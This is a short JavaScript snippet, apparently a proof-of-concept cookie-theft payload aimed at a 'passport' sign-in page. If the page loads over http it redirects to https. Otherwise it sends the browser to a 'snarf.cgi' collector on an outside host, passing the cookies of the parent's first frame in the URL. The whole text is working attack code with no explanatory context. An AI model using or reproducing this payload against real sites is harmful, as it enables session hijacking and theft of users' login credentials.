//alert(document.URL);
s = new String(document.URL);
if (s.indexOf('http:') == 0) {
	setTimeout('document.location="https:" + s.substring(5, s.length-1, 1000)');
} else {
	document.location="http://alive.znep.com/~marcs/passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie);
}
